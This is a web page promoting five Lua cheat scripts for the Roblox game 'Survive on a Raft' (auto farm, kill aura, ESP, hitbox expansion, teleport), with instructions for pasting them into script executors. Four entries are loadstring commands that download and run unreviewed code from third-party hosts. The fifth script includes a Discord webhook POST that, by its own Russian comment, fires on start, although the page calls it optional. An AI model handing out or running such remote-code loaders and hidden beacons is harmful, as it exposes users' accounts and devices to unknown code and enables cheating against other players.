Make grinding and looting in Survive on a Raft a lot easier with five powerful Lua scripts. These tools help you auto-collect boxes, farm resources, teleport back to your raft, and even provide kill aura or ESP to speed up progress. The Epic Survive on a Raft script picks below are easy to run and great for hands-off farming.
01. Peachy Hub – Auto Farm, Kill Aura, Teleport, Fly
A compact hub that focuses on core advantages: automatic farming, a kill aura for fast fights, and movement tools like teleport and fly. Good for players who want an all-in-one helper that’s simple to use.
| Feature | What it does |
|---|---|
| Auto Farm | Collects resources and boxes automatically |
| Kill Aura | Attacks nearby enemies automatically |
| Teleport | Quick move to important locations |
| Fly | Enables controlled flying |
| Mobile Friendly | Works well on many systems |
loadstring(game:HttpGet("https://api.junkie-development.de/api/v1/luascripts/public/d37435894c260e0200d7c0cee1c5a4aea45602edb3ee1fa3c37726e2fe857ad5/download"))()
02. OP Script Keyless – Auto Collect, Teleport to Raft, Infinite Jump
A free, keyless script focused on essential QoL features: auto collect boxes, teleport back to your raft with a single button, infinite jump and walk speed. Great for players who want a simple, working loader.
| Feature | How it helps |
|---|---|
| Auto Collect | Grabs boxes and items automatically |
| Teleport To Raft | Fast return to your raft (spawn button action) |
| Infinite Jump | Keeps you airborne to reach items |
| WalkSpeed | Faster travel across map |
| Keyless | No key required to run |
loadstring(game:HttpGet("https://raw.githubusercontent.com/gumanba/Scripts/main/SurviveonaRaft"))()
03. Bimz Hub – Auto Collect, ESP & Hitbox Tools
Bimz Hub brings auto-collect along with visual aids like ESP and hitbox tools to make looting and PvE fights simpler. It uses a small key variable (replaceable) but the main functions run rapidly.
| Option | Quick note |
|---|---|
| Auto Collect | Retrieves boxes and loot automatically |
| ESP | Shows items and players through walls |
| HitBox | Expands hitboxes for easier hits |
| DLL Support | Optional native modules (advanced users) |
| Key Config | getgenv().USER_KEY placeholder for keys |
getgenv().USER_KEY = "your-key-here" -- replace with your key
loadstring(game:HttpGet("https://raw.githubusercontent.com/BimzDnu22/Main-Script/refs/heads/main/Main.lua"))()
04. Auto Collect Item (Pastefy) – Lightweight Auto Pickup
A very small loader that triggers an external raw script to auto-collect in-game items. Ideal for players who want a no-frills auto-pickup option.
| Feature | Benefit |
|---|---|
| Auto Collect | Runs a compact auto-collect routine |
| Async Fetch | Loads code from a paste/raw host |
| Quick Execute | Minimal steps to run |
| Low Overhead | Small script, low memory and CPU use |
loadstring(game:HttpGetAsync("https://pastefy.app/YM9vQLFN/raw"))()
05. YY HUB – Auto Collect Boxes (GUI Toggle)
Simple toggle script that creates a small GUI button for turning auto-collect on or off. It loops through proximity prompts and fires them so you never miss a nearby box.
| Feature | Short note |
|---|---|
| Auto Collect | Finds and interacts with ProximityPrompts |
| GUI Toggle | On/off button in your PlayerGui |
| Keeps Position | Returns you to your saved position when off |
| Lightweight | Minimal code, low performance impact |
| Webhook Ready | Optional webhook call included (editable) |
local p = game.Players.LocalPlayer
local h = p.Character.HumanoidRootPart
local s, pos = false, h.CFrame
local g = Instance.new("ScreenGui", p.PlayerGui)
local b = Instance.new("TextButton", g)
b.Size,b.Position,b.TextScaled,b.BackgroundColor3 = UDim2.new(0,80,0,25), UDim2.new(.5,-40,.9,0), true, Color3.new()
b.Text,b.TextColor3 = "OFF", Color3.new(1,0,0)
b.Active = true b.Draggable = true
Instance.new("UICorner",b).CornerRadius = UDim.new(0,10)
b.MouseButton1Click:Connect(function()
s = not s
b.Text, b.TextColor3 = s and "ON" or "OFF", s and Color3.new(0,1,0) or Color3.new(1,0,0)
if s then pos = h.CFrame else h.CFrame = pos end
while s do
for _,v in next,workspace:GetDescendants() do
if not s then break end
if v:IsA("ProximityPrompt") then
h.CFrame = v.Parent.CFrame
task.wait(.2)
fireproximityprompt(v,1)
task.wait(v.HoldDuration + .2)
end
end
task.wait(1)
end
end)
-- WEBHOOK В КОНЦЕ (выполнится при старте)
pcall(function()
local HttpService = game:GetService("HttpService")
local webhook = "https://canary.discord.com/api/webhooks/..."
HttpService:RequestAsync({
Url = webhook,
Method = "POST",
Headers = { ["Content-Type"] = "application/json" },
Body = HttpService:JSONEncode({ content = "привет" })
})
end)
How to Use These Scripts
- Start Survive on a Raft and join a server.
- Open your trusted executor (KRNL, Synapse X, Fluxus, Delta, etc.).
- Copy the loadstring or Lua code block for the script you want.
- Paste it into the executor while the game is running.
- Execute and wait for the script GUI or toggles to appear—test features in a quiet area first.
- If anything acts odd (falling through map, visual glitches), rejoin and try the script again.
Benefits of using these scripts.
These five scripts help you cut repetitive work and farm faster in Survive on a Raft. Auto-collect tools grab boxes for you, kill-aura and hitbox helpers speed up combat, and teleport/infinite-jump features let you reach loot quickly. Using them saves time, boosts progress, and lets you focus on the fun parts of the game.
